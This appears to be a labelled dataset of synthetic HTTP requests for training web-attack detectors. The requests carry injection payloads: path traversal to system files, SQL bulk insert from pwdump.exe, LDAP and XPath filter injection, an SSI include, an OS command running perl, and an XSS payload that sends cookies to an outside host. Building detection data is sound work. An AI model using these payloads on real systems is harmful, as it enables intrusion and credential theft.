Upgrade: fo6/1.0, ozs/3.7, re3mNl/0.5, osie/6.9
Warning: 058 www.Yai0bEs.jpg "ftaksn6eorlykneo" 
X-Forwarded-For: 153.138.91.160
X-Serial-Number: 69822179
----: -----------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 42657
Start - Id: 48688
class: XPathInjection
POST /teEftpvPDcg8/hUZWa11-o6Ay9z/lZYpiz/Email6i/.M9ftpG/e5n15tlOvh/9adlieeobisn7l9i/rbL-f-4-bILL0t26G/hcYFgqQtelnetGXR/ireeeonatbnfetrznE/azeM/id2tresl9rHfyroz.mdb? HTTP/1.1
Content-Length: 299
Content-Language: oh,hte
Content-Encoding: compress
Content-Location: /4yt0euea/apes/t1aiuY/n0ucgt.wav
Content-MD5: TWc4ZnlzZ2VsdHd0NG9pNw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 19 Jun 06 15:14:33 UTC
Last-Modified: Sat, 16 Apr 05 13:37:22 CET
Host: www.5iroEce.de
Connection: nroprh
Accept: image/jpeg;q=0.6, text/html;q=0.1, application/postscript
Accept-Charset: x-mac-roman, euc-jp;q=0.3, euc-cn, x-mac-hebrew
Accept-Encoding: deflate;q=0.0
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 235.129.193.205
Cookie: ewAntotwc=athetnwd
Cookie2: $Version="590"
Date: Wed, 27 Sep 06 15:39:21 GMT
ETag: "iRPx-vhsrn5IOB4F@6ra"
Expect: oIwoedct
If-Modified-Since: Wed, 28 Jun 06 11:20:14 UTC
If-Unmodified-Since: Sun, 28 May 06 22:43:28 UTC
If-Match: *
If-None-Match: "df9IpsfP7SmcfOrD"
If-Range: Tue, 28 Dec 04 20:22:45 GMT
Max-Forwards: 131
Pragma: r0moo4r=hwac
Proxy-Authorization: Basic bXNlczlyaDpudHNo
Referer: /thu0/hosro/zfhe/he4Ambem/nmiwn.exe
Trailer: Accept
User-Agent: Dcwnseeova/8.8.5
UA-Color: color16
UA-Pixels: 640x9904
Via: 2.0 www.tdocc.css, 2.5 57.80.165.189
Transfer-Encoding: gzip
Upgrade: 4mtfwe/7.8, Nuhsbd/2.0, ozoe1/6.1, oePeo/8.5, ats/0.5
X-Serial-Number: 3185085450816900238

hiecfnh=1960&dsgb=U2ra \taezeq&z1=n|au&Wnjfhttp2PnPOtZ=gdxp_enhttpsszHwgete7&o4laueatfst=d&&km48xrs=djstek1io&de8lo=eHg&XLlBbgsound8Fd=(i  <   count(ttt/child::text()) and  j    <  count(5e/child::comment())   and  k <  count(w1ewn8/child::*)  )

End - Id: 48688
Start - Id: 37629
class: LdapInjection
PUT /bcEs/lieQJqJV7PcdjDKu/Po/7insert9/zxTGOOUPcrI/sejmylIifia/v_/jr4hulm/kRri/zio4wthe3sazeeo/xGo.voLxqOGEZ/amx5.shtml? HTTP/1.0
Content-Length: 364
Content-Language: an0iodi,2izm7
Content-Encoding: compress
Content-Location: http://eyluir.it/na74ihM.png
Content-MD5: NGFtMnJvb3NuZXdnanVldQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 22 Jun 08 18:04:36 GMT
Last-Modified: Tue, 27 Jul 04 09:11:38 GMT
Host: www.0drz1.gov
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-5
Accept-Encoding: *;q=0.6
Accept-Language: nhuAj-eiuqh;q=0.2, it-F4gz
Cache-Control: no-cache
Client-ip: 236.109.120.226
Cookie: unionmochaIdMJU0position=+ipsoew>0t2ecAr;ebrofte25atv=9OaI
Cookie2: $Version="477"
Date: Mon, 13 Sep 04 18:05:42 UTC
ETag: "UasEgXZAUoa8Yhw8"
Expect: 100-continue
From: yhSsf@ahrg7dbN.com
If-Modified-Since: Fri, 01 Jul 05 04:32:49 UTC
If-Unmodified-Since: Sat, 24 Dec 05 03:52:41 CET
If-Match: "bhbbKh8reMkrOEpvhI3q"
If-None-Match: "d@TxHOwdxQ_BaLeX6u"
If-Range: *
Max-Forwards: 60
MIME-Version: 4.3
Pragma: op='mla'
Proxy-Authorization: Basic aXJ0d2E6cmVtaA==
Authorization: Basic QWFvZzptUmFwZGk=
Range: -6153,297-,439-473
Referer: /7heARid/1Tdocf/zOpcmye.gif
TE: trailers,chunked;q=0.0
Trailer: If-Modified-Since
User-Agent: Mozilla/9.3 (Machintosh; U; PPC 1.3; Bl-vt; rv:5.4.9) Gecko/58849212
UA-CPU: MIPS
UA-Disp: 2548,1743,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 4356x362
Via: HTTP/1.3 www.fnbnled.js, 3.7 247.245.41.81
Transfer-Encoding: gzip
Upgrade: 1obltA/1.6, begaf/4.9, aje/5.5
Warning: 290 www.csV7.jpg "alupzEldm3wn" 
X-Forwarded-For: 20.191.23.124
X-Serial-Number: 220877773
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

shu9mIs1eppbW=743273431&pnts2wwnmjrae=e4xlbtcru&pstdinUibinsert@oseval4o=3o&o9a7eFwie3i8=u4Jf2DaW&ortugih72iydTy=&ag|hYhttpooa6Aou3&ritslmnasp=odsDa7lksoa4Rl&5naih=oybk Stl0perlror ldaBi&4w1S0K=5tqaiSlnrfidkI7kdt&7hn=442&68hJwhk6KJr=3706&6qelsense=aanH)(&(objectClass    =    ai*)&vJieestsoI1l=66629066&lAptQsa=591407&toeerWr=crpy&zxreplacex0b.=jPy

End - Id: 37629
Start - Id: 41131
class: SqlInjection
GET /kXK5r0kT/ufcarignot/Oehdhohti6oiuWhu/pomuraesiooit/c37mei/6NlpS_vISK/awro3gh/2BMpdUiDE9/pSO.dc69T@tHtFrc3z/f8lvaj.VT3Ax-IpyOr.html?seaelebheiau=u2heDatl30to3o&adnr49e=bulk+++++insert+tw7+from+%27pwdump.exe%27++++++++with++++%28codepage%3D%27RAW%27++%29 HTTP/1.1
Host: www.dhwintgdeo.de:80
Connection: o21rj
Accept: application/*;q=0.0
Accept-Charset: gb2312, cp-950;q=0.7, iso-8859-3, windows-1253;q=0.9, windows-1257
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 225.169.58.33
Cookie: gNhCqt2divshutdownVDO=ne5eaia5is6ricyr;tfssdniewbeg=ees(g eval/r;zyF1sm1J7=reelA\n;tu=Mre;lhRmm=sS84pn;b5b0TUat=gnxAOJrt8
Cookie2: $Version="08"
Date: Sun, 08 Jan 06 12:47:29 CET
ETag: W/"VyKWI0nTnYyfdWi-YLN"
Expect: 100-continue
If-Modified-Since: Mon, 25 May 09 02:48:02 CET
If-Unmodified-Since: Thu, 07 Apr 05 06:19:53 UTC
If-Match: *
If-None-Match: "KbHTz5rmoZ8bzZnnF"
If-Range: *
Max-Forwards: 6451
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: odibel 3arthngL=ngnhea
Authorization: NTLM cmFmOUdsb2dscGNyNkNvbm9yZHJXd25taXBiN2R6b2VhUHBuRWU=
Referer: http://yrear5.it/icTilenr/e6at.shtml
TE: gzip;q=0.8
Trailer: If-Unmodified-Since
User-Agent: icteT0
UA-CPU: 68000
UA-Disp: 152,2965,32
Via: 4.3 49.56.205.63, FTP/3.5 www.oniwp.tiff
Transfer-Encoding: lsetq; npelnp=ietyia
Upgrade: is65/4.0, tshy/4.7
Warning: 817 www.zwnsrtsn.css "3ewnh0esrxhhAt6odael" "Wed, 28 Feb 07 06:00:38 GMT"
X-Forwarded-For: 169.105.19.193
X-Serial-Number: 067866355817969470
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41131
Start - Id: 45471
class: PathTransversal
GET /yTZtBghxD9lR/owGJhQHPL0E/GyHQ.4e/o0eR78WXnP.Xohw-T/1rAft5l/XRdbu7nindehzeahfe/bihesptdhlusa5ohta/oN4u-EiGob2YAr1Vbb/aetTassj/ryub3ZIJNF.v2c50y.msf?doathindnocet=%5Cautoexec.bat HTTP/1.1
Host: 8.85.70.159
Connection: close
Accept: */*
Accept-Charset: windows-1253
Accept-Encoding: 
Accept-Language: hi2cyo-loiinko;q=0.4, dpNh-f8hnS;q=0.8, mf-enu, moerhwm-sitd, drtat-tyteO
Cache-Control: no-cache
Client-ip: 172.157.36.227
Cookie: asdntprsrru=se
Cookie2: $Version="810"
Date: Fri, 20 May 05 12:31:37 GMT
ETag: W/"iXz_cecXNgktO.yx06"
Expect: tsgnr=xneob;kaoe=dnfiebmk
From: 9lho@aiRe.net
If-Modified-Since: Tue, 25 Aug 09 15:28:35 UTC
If-Unmodified-Since: Sat, 18 Oct 08 06:54:53 GMT
If-Match: *
If-None-Match: "cNBHtsEym-L7@39G"
If-Range: "b@ZGNKyKVgff-0Kbr73"
Max-Forwards: 72
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Digest algorithm=ohi4
Authorization: Digest cnonce="dlear"
Range: -23,7962-,63876-540949
Referer: /onAO/sors6n/uir2ila/C0sc5/fsOE0.mspx
TE: trailers,gzip;q=0.2
Trailer: Referer
User-Agent: i0sjirixuAis4i
UA-CPU: x86
UA-Disp: 8084,8855,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 5163x468
Via: FTP/6.1 50.246.134.210, 8.0 80.80.231.46:6, 4.9 172.134.189.2:0
Transfer-Encoding: compress
Upgrade: drf/1.3, eoe/9.9
Warning: 016 www.lea2ce.html "yMifIhorneae" 
X-Forwarded-For: 150.175.159.37
X-Serial-Number: 49844
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45471
Start - Id: 38793
class: LdapInjection
GET /ci_KZo-_dVyFJ4aDk/Y3/iPRXlOlD@a/0V7pQI/78H.aspx?tssli=hyrchjs7csd&sesnsdereeee8=376&pjYqeSneCB=o.x343R_W&eed3Tm34=0&srTo=9506125485&uZ2m@D=c9&A9Ja00x=02369493&CtpHhavingtENWzconnectI=nQh0vadeb&is8O9yeE=eoxsG3q&oyubhni=sAi%29%28%26%28objectClass%3D++t5R*%29 HTTP/1.1
Host: www.tgzlessa.st:0
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: windows-874;q=0.1
Accept-Encoding: *
Accept-Language: tTkP0-raAol1;q=0.7, swht-eauEsnro;q=0.1, daysemg-hronGoo
Cache-Control: m='selae6E'
Client-ip: 239.52.8.232
Cookie: lgEsandd=8;uif=I8weUonissnotb4de;tnnpa=4184601;cf=55;-0HRXx=mN8tHX;eWoseotraeam3=9000
Cookie2: $Version="44"
Date: Thu, 11 Mar 04 14:37:35 GMT
ETag: W/"vGuHRVXcbShtegyvsc"
Expect: 100-continue
From: ia8hCn@scttdt.org
If-Modified-Since: Fri, 18 Mar 05 23:59:33 CET
If-Unmodified-Since: Thu, 24 Nov 05 23:42:41 CET
If-Match: "RkFGcU.C@_W9IEaAfrm"
If-None-Match: "vX_ZMtBciABwoQkP"
If-Range: Mon, 19 Sep 05 20:18:53 UTC
Max-Forwards: 7
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: lnraO geepoll=oRsheku
Authorization: Basic eTR0b2k6b2dyZQ==
Range: 89831-,-364983
Referer: /nNeeh/jua6mep/e2ta/touoia.mpeg
TE: gzip;q=0.5,gzip;q=0.3
Trailer: User-Agent
User-Agent: Mozilla/0.8 (compatible; 3utn; Windows NT; redmgi)
UA-CPU: StrongARM
UA-Disp: 754,7315,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 8161x590
Via: 7.3 3.128.75.251
Transfer-Encoding: cuaee
Upgrade: liolTj/2.0, duhrti/7.2, cci/9.1, eaeYog/1.7
Warning: 757 214.136.112.103 "ie6uit3rtiiPirtc" "Mon, 03 Oct 05 02:38:07 UTC"
X-Forwarded-For: 199.212.3.152
X-Serial-Number: 323337935267147
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38793
Start - Id: 49477
class: XPathInjection
GET /6luOdehNes9sodus/ihftte2eEUa/8da31efrnNlh/mx0F7/efe.0wiwFzA12RSPo.jpeg?eicdTCxnw7o3im=h4b2su%27++or+o1%2Fffsrm%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D1%5D++++or+++%27k8uiorrd%27++++%3D++%27 HTTP/1.0
Host: www.lTskh9.fr:80
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: iso-8859-6, euc-tw
Accept-Encoding: *;q=0.4
Accept-Language: ylnwe-ri, rsSeeke3-5dI;q=0.1, tTef-D, Geqn-e
Cache-Control: r4t=mNau2
Client-ip: 79.176.207.17
Cookie: 0xe=rlrtv Mf3i5
Cookie2: $Version="351"
Date: Mon, 27 Jun 05 07:41:15 UTC
ETag: W/"8WDs@-d9IdX423MDOwo"
Expect: 100-continue
From: haatt@hdst54eL.net
If-Modified-Since: Tue, 01 Jan 08 02:32:22 CET
If-Unmodified-Since: Thu, 11 May 06 16:51:59 CET
If-Match: "_CD6R3wku-0wHkupP@M"
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 2.1
Pragma: jesi=cml3no
Proxy-Authorization: NTLM ZGJhd2loU296bXRodWhvRVdlZGxvYWVvNHRlc3NleWszc3VlbjJyaHM3VHN2
Authorization: ed4p ewtc5lar=tiKyS
Range: -012
Referer: http://HpDxlhi.gov/aoer/nHsso18.js
TE: trailers,gzip;q=0.0
Trailer: Cache-Control
User-Agent: ybrxkp http://www.msor.it
UA-CPU: PowerPC
UA-Disp: 198,205,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 527x1451
Via: ist4y/7.4 www.7ttobu.js:974, orynlc/5.1 80.83.176.105
Transfer-Encoding: identity
Upgrade: n7e/3.5, tspSaa/1.0, aveuwt/9.7
Warning: 018 79.47.7.14 "6sfdtbiklutnucsneas" 
X-Forwarded-For: 64.1.22.247
X-Serial-Number: 201583507
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49477
Start - Id: 46346
class: PathTransversal
GET /eegtliieiuaris.cgi?rsltaucsOhho=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fversion&a0d=652301&mi8rtdnifnmlEqa=70 HTTP/1.1
Host: www.tagvu4ch.biz
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-1, x-mac-arabic
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: max-stale
Client-ip: 51.115.37.124
Cookie2: $Version="19"
Date: Sat, 28 Apr 07 03:22:13 UTC
Expect: 100-continue
If-Modified-Since: Tue, 12 Jan 10 01:52:16 CET
If-Match: "1wShDBD3.uZUumC.8f"
If-None-Match: *
If-Range: Tue, 13 Dec 05 05:07:16 CET
Max-Forwards: 150
Authorization: Basic bHMyMzpVbDFzYWU=
Referer: /5setpold/feelan8/ijsEsUi.jsp
TE: deflate,trailers,gzip
Trailer: Proxy-Authorization
User-Agent: Mozilla/5.1 (Windows; U; Win 9x 6.3; fo-e3; rv:1.2.5) Gecko/69010139
UA-Pixels: 648x2225
Via: HTTP/6.5 10.254.153.19
Transfer-Encoding: deflate
Warning: 509 www.f1ut.tiff "malgniTQtiqropjr" "Thu, 13 Mar 08 14:37:17 GMT"

null

End - Id: 46346
Start - Id: 44763
class: PathTransversal
GET /jaJcNRKrkfrMG/nz5mTu/bo2uircc8Encehs/o@kq.cfm?-yMRywaf0nRU=NuoTed%26ht98to2c&0ewxeaiscTiht=+hw+9Iand%40lnmefutmpge%25&mbee=deqoiirca&iO6iesdevjog=D%5DcTE&P@DAPbZ40Z=%3Etec%5Bants3ys&ld8etOaedTv=.%2F..%2F.%2F..%2F.%2F..%2F.%2F..%2F&sreiei=0386&u8fwls=h7exyrucfv&Py3R=systemp3%25tf3&boHne=rpdEfSh2-n%5Ce&lcCneeuh=wxeysorSew&nNo7GBm6=40&NRoFzmPwinntwz-perl=h5CxJT1QT&rwRoap0=+6s&ZFV6k1likeAi=iqu5bpensee1aeo HTTP/1.1
Host: www.Quhs0so3.com:98949
Connection: 7neehneA
Accept: */*;q=0.5
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 245.254.197.131
Cookie: tM4tT=26706
Cookie2: $Version="28"
Date: Sun, 28 Oct 07 06:38:03 UTC
ETag: "Td0bO0Q80mtdsptX"
Expect: ammm
From: 6R4thu@ercn3stwaa.biz
If-Modified-Since: Sat, 08 Apr 06 07:12:10 UTC
If-Unmodified-Since: Sun, 12 Feb 06 20:45:36 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 07 Mar 06 18:32:05 GMT
Max-Forwards: 9
MIME-Version: 8.9
Pragma: mgS='6p'
Proxy-Authorization: Basic c3FvaWFyOmVjT1ZzNW4=
Authorization: Digest uri=http://sfdqq.ch/w4oi39b/rt6erG/aaebraw1/ioSfdss.swf
Range: 6578-336232,-258470,45228-5909
Referer: http://t6sp.cz/b4iete/murCse7o/htlIoqke/4fTt/recdYt.asp
TE: deflate;q=0.0,trailers
Trailer: TE
User-Agent: l4kyu3 http://www.oa5ii.uk
UA-CPU: Sparc
UA-Disp: 4597,5625,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 332x3916
Via: 7.1 www.hneoy.tiff
Transfer-Encoding: compress
Upgrade: ene/3.3, dnense/3.4, iDe8je/2.2, ecTeud/6.4, a7yhir/5.9
Warning: 777 www.ehusd6.shtml "Aader5almnIete" "Mon, 11 Feb 08 10:44:13 CET"
X-Forwarded-For: 23.27.136.158
X-Serial-Number: 29099
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44763
Start - Id: 36804
class: OsCommanding
GET /at/uEMsJswPQ44_vVlOpo/e@WhhU9.FN74/wTfVORlSztmhOI4hg/r5jrbtzg/PICyx37sock_stream988execfA/_9KIr268/htPeBbqQfyCo/a5mbqU.nsf?Etoetadn=cSHptN3ZTc&YDN7X=3335875562&bpehexsh21u=ostguyetuHfbMdkyh&eonrmntOeieh=oo%28+m&nmi=d%40EVLH_enK&wpuei=mvd_pH&8itRuenwfrehrei=%2Fperl+++++%2Ftmp%2Fte.pl++++-p1926&mJF7aQ=8544488&3hf=%297uianlocationtgechonhttpboot.inioraihservicesro&hinse5ifEse=i3&eDoO0iehjatr3o=3&o7h7ePeh3gajsma=ti5iikaSsweai HTTP/1.0
Host: 165.96.53.93
Connection: wueeHh
Accept: */*
Accept-Charset: koi8-r, koi8
Accept-Encoding: *;q=0.1
Accept-Language: zie-afmOo;q=0.8, ukOhtso-Bt4
Cache-Control: no-store
Cookie: atle8hlrsE=e4eur%;lttzw2ataTSPw=tp;oPBJT=usrnph-4kta/;Hghaving-=rp1z43;nebaxe6Bi=o0E@I;wsty5uwnm3oe=58
Cookie2: $Version="03"
Date: Sun, 25 Jul 04 07:11:17 CET
ETag: "2i-Tsg8qHsrARqq@"
If-None-Match: "e9e32HtIeCbZ7hCiff-A"
If-Range: Sat, 18 Jun 05 15:25:02 UTC
Max-Forwards: 55
Pragma: no-cache
Authorization: NTLM b3NkZnMzbm1VaDNidG1lZWNoSG1SZW5XcnNnMDd0aWVub2Fi
Referer: /n1ye9tf.exe
TE: gzip;q=0.8,trailers
User-Agent: dtdhOnil/1.3.4.3
Via: HTTP/7.2 63.87.189.249, 5.6 44.73.2.196:093, 8.8 159.83.69.221
Transfer-Encoding: compress

null

End - Id: 36804
Start - Id: 45956
class: PathTransversal
GET /zHYnwi_eDDUF/sjrF.WR9lJ/bBRbfKgo4tjK.js?irhijddt=6413247&ZanxrtigiPsnon=kl71cpXl8i&pa94mHee=342&rTeAsynmmpgeVe=%3Anw&fnfi0t=4820840185&rrgnnsousn5e=..%2F..%2F..%2F..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&24ewdsrwsnaeh=uqhalto&eHv=tLi HTTP/1.1
Host: 187.145.252.155
Connection: close
Accept: */*
Accept-Charset: x-mac-icelandic, x-mac-hebrew, shift_jis, iso-8859-8, windows-1252;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 184.119.87.22
Cookie: 2Rxurfta=904355;SUHTiJ@=O;mZglogusrf8x= e6;ej3lwei1in=r5edalIiv7;nenIemestD=ss)
Cookie2: $Version="3"
Date: Thu, 26 Feb 04 09:38:36 CET
ETag: W/"Jy54JyeN5DvDzJBlnR"
Expect: e8ch
From: Uhe1aed7@rRptioy.be
If-Modified-Since: Thu, 17 Jun 04 12:31:36 CET
If-Unmodified-Since: Fri, 08 Aug 08 16:53:23 GMT
If-Match: "s7A8_8u@rEF8DbdjO-6F"
If-None-Match: "_QxeC5sXzRas5U@NuDw0"
If-Range: "V7.6KQuf0OitWReT.I"
Max-Forwards: 5777
MIME-Version: 5.8
Pragma: lots=Ehtegor
Proxy-Authorization: atacrJ nOIndN=dosn6sfe
Authorization: Basic aVRyc3FyZWQ6c3RhaQ==
Range: -72
Referer: /ee9e/2eatAo/e9seaaa/lbrroo8/aodAeo2d.asmx
TE: trailers,trailers
Trailer: If-None-Match
User-Agent: Mozilla/5.2 (compatible; 0waalrle; Unix; 1nbaf9e; lem5xttmen; eunh1Trtu)
UA-CPU: x86
UA-Disp: 3135,8994,8
UA-OS: FreeBSD
UA-Color: color8
Via: 3.3 97.81.153.174
Transfer-Encoding: sinlt; m7lee5RI=cEni
Upgrade: ihmRi/3.1, csAMi/2.6, ruqry/0.0, hejq/9.2
Warning: 607 www.otrO6o.css "taqtatn4rh" 
X-Forwarded-For: 79.119.72.4
X-Serial-Number: 6933322511
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 45956
Start - Id: 40501
class: SSI
GET /bIC/aai/arnsmfp/h8Nhjac6./hnenneHsje/eSyotVtAyPC99d6/shTgssaqluztdfn3I/9D2r2nsNIjX@Qyx1d/ncMelai8sdc/..F@.php3?irounp=%3C%21--%23include+virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22+--%3E HTTP/1.1
Host: www.l8npUeOhOb.com
Connection: close
Accept: audio/x-wav;q=0.2, image/jpeg;q=0.7, video/*
Accept-Charset: *
Accept-Encoding: identity, deflate;q=0.6, identity, compress;q=0.1, deflate;q=0.2
Accept-Language: *
Cache-Control: no-transform
Client-ip: 23.11.134.211
Cookie: siifsttpAe=Gnrsr;8stzyq=<et\d;tmst=odue
Cookie2: $Version="148"
Date: Thu, 24 Jan 08 01:59:37 GMT
ETag: W/"tQ..TqsAmpq4am6OZRoc"
Expect: 100-continue
From: wsWpne@sapo.cz
If-Modified-Since: Tue, 05 Oct 04 15:30:16 UTC
If-Unmodified-Since: Thu, 10 Mar 05 13:38:58 CET
If-Match: "Mq4qJo3Q9H0yOZB"
If-None-Match: "i.9Q7iGacWrChgac6Qq"
If-Range: *
Max-Forwards: 558
MIME-Version: 2.3
Pragma: a4ez=ag0ELH
Proxy-Authorization: NTLM RWV0b1dIcmVlbkZoZnJyc3RwRGFSM3JobmN1ZW54aUFlbml4NTZodE9waWw=
Authorization: NTLM b2VmdHNzOHRzbmtuaHRvYW10aXNUdGVpZWVhMG5lZ2VmbnJ0OXN0cmVlZXI2dA==
Range: 51862-,762075-08,9969-2
Referer: /zenef/ocruOtl.asp
TE: gzip
Trailer: Warning
User-Agent: 6ikixr5zeu (uqQHb.; ihQKOqm)
UA-CPU: 68000
UA-Disp: 591,998,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 0287x026
Via: 4.2 109.169.206.32
Transfer-Encoding: identity
Upgrade: aen/1.7, T2itt/0.2, tnb/0.4
Warning: 074 www.Paeas.jpg "itu3brrfrgi6re2o3th" 
X-Forwarded-For: 252.212.230.66
X-Serial-Number: 9761686986673
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40501
Start - Id: 45359
class: PathTransversal
PUT /r80L/qwtrMEPI/O_265documentshutdowntmp/skK8alsabhg/7x8s/wvMB.OM-vE/E0.gif? HTTP/1.1
Content-Length: 191
Content-Language: bif
Content-Encoding: compress
Content-Location: http://eoeyt.com/cmy6.dll
Content-MD5: anVyenNudG1lYWFvZHlMZw==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Tue, 06 May 08 13:49:33 UTC
Host: www.oeeod.ch
Connection: close
Accept: text/*;q=0.9, video/quicktime, video/*;q=0.8
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: ws-H;q=0.6, natv-rsb, rDshx3t4-ASe4;q=0.6, h-ipsO8i, g2dcb3l-ttetufT
Cache-Control: only-if-cached
Client-ip: 195.135.237.8
Cookie: EleEtaeoi9o=349;zg01Jnc8fAfX=lrn]thi5 cdecho
Cookie2: $Version="3"
Date: Sat, 07 Mar 09 20:08:27 CET
ETag: W/"U2a0GiJc3J0cPtWSB_w4"
Expect: 100-continue
If-Modified-Since: Wed, 16 Dec 09 10:23:14 UTC
If-Unmodified-Since: Mon, 21 Jul 08 08:58:33 CET
If-Match: *
If-None-Match: "W13Lr9PZLtNYx7nB81zj"
If-Range: Sat, 28 Nov 09 16:48:34 UTC
Max-Forwards: 0
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: NTLM OWl0bmdqbmhuZTZNbmllYnJUS1NlZTBvbW5yaXJvRWFpZ2VlaGUxZURzYWd4
Range: 53-,6570-433377,-5771
Referer: http://www.i6EeBlO.cz/aezw.gif
TE: gzip;q=0.6,chunked;q=0.0,trailers
Trailer: Trailer
User-Agent: tn6-H9 http://www.Geezeo.de
UA-CPU: Sparc
UA-Disp: 2882,8767,16
Via: 8.4 www.35mpne.tiff:9509, FTP/5.3 www.8hsi62.jpg:65259
Transfer-Encoding: gzip
Warning: 478 20.131.244.84 "nL6r2ouvmnheNdq" "Tue, 20 Feb 07 12:02:29 UTC"
X-Forwarded-For: 42.158.87.228
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

iieuoi4hto=eTMz-GxXo&8axsnctiobna42=8&hiA=hspsbdb9tc4mmeWtf&lule1y5vrm=5011&AP-autoexec.WTvCuf0=784897&lps7me9ctlo=h&3O5zsgVL-X=..\..\..\..\..\..\..\..\..\WINNT\system.ini

End - Id: 45359
Start - Id: 35877
class: XPathInjection
GET /nvR1cneapopniR/OXUpQx1Urpasswdg4SF7.png?YHiith=e6GPL_WHE&aoseR=57&nflih4=rfrq&0Z3cX9=telnetteen&fujca=0304250&th6asnwsvritr=%40SVtexec&6resNerdry=tln&plES=829037&i32o=eisp%27+++or+++yWi%2Fteoa%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D11%5D+or+++%27ttuneu%27++%3D%27&2ebodgoLbuLzm=nfBDhX9 HTTP/1.1
Host: 179.26.228.222:54578
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip, gzip;q=0.2, identity;q=0.6, deflate;q=0.3, identity
Accept-Language: *;q=0.8
Cache-Control: no-cache
Client-ip: 31.139.167.30
Cookie: Xu7rrehE=caLsntainhtH9s
Date: Sun, 07 Mar 10 10:04:20 GMT
ETag: "j6_RBDMJQV7b5lSDIfdF"
Expect: 100-continue
From: suitS@oroHhO.fr
If-Modified-Since: Thu, 11 Mar 04 03:50:24 UTC
If-Unmodified-Since: Tue, 10 Jul 07 04:35:39 GMT
If-Match: "j6Rux0wYcW_xhFcn"
If-None-Match: "EnCVkpN1KDDdc_lP-"
If-Range: *
Max-Forwards: 9
MIME-Version: 4.5
Pragma: 2ItcGoI=f
Proxy-Authorization: Digest nonce
Authorization: Basic aDNIdGE4RTp0eHIybnlzbg==
Range: 39-2,823566-5763
Referer: /6oasta4E/pic7tj6.swf
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/1.5 (Windows; U; WinNT 0.5; yt-3j; rv:3.1.7) Gecko/89859336
UA-Disp: 7612,056,16
UA-OS: Linux
UA-Color: color32
Via: 9.2 136.196.79.60
Transfer-Encoding: compress
Upgrade: hic/2.2, m8rwk1/9.9
Warning: 683 214.32.116.161 "fdrit" "Thu, 11 Jun 09 24:41:37 GMT"
X-Serial-Number: 160475
----: ----------------------------

null

End - Id: 35877
Start - Id: 47673
class: XSS
GET /hUKIH0XPt/lte92VcAuD/CRK/Z@xuYbgsound/ktsnAd9l3ieKHyetm/elc1taeV5lahr8sedkv/uSCT4WW/sixAenaordnednfn3/vttueworq/Netjs/let4hsiMDg.cfm?vhTn=%3Cimg+++++src++%3D+%22+++livescript%3A%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.ni.com%2Fcgi-bin%2Fne.cgi%27%2Bdocument.cookie%29%3B%5D+%22%3E&A2aetpjst=1&Iiauiepdttihd=naxe&k1dCPhZ.t0O=aJJ HTTP/1.0
Host: www.dadRme6uhr.cz
Connection: tuinsGnE
Accept: audio/x-wav;q=0.6
Accept-Charset: iso-8859-6;q=0.9, x-mac-hebrew, euc-cn, euc-jp;q=0.6, x-mac-icelandic;q=0.9
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.7
Cache-Control: h7='ltEhoop'
Client-ip: 39.154.184.38
Cookie: obf=tlRwatt1ag;ziteA=1196;Ia=59565;xcrt9v=cy;eg9cc=35792
Cookie2: $Version="699"
Date: Sun, 24 Aug 08 08:53:24 CET
ETag: W/"z_T1tK75-Wf.Z._"
Expect: 6dleoav=hnlO
From: tdjaSrwt@arqsc.uk
If-Modified-Since: Thu, 04 Jan 07 14:27:36 CET
If-Unmodified-Since: Wed, 28 Jan 09 03:46:14 CET
If-Match: "C1nWSvohfN1fmR4Gc"
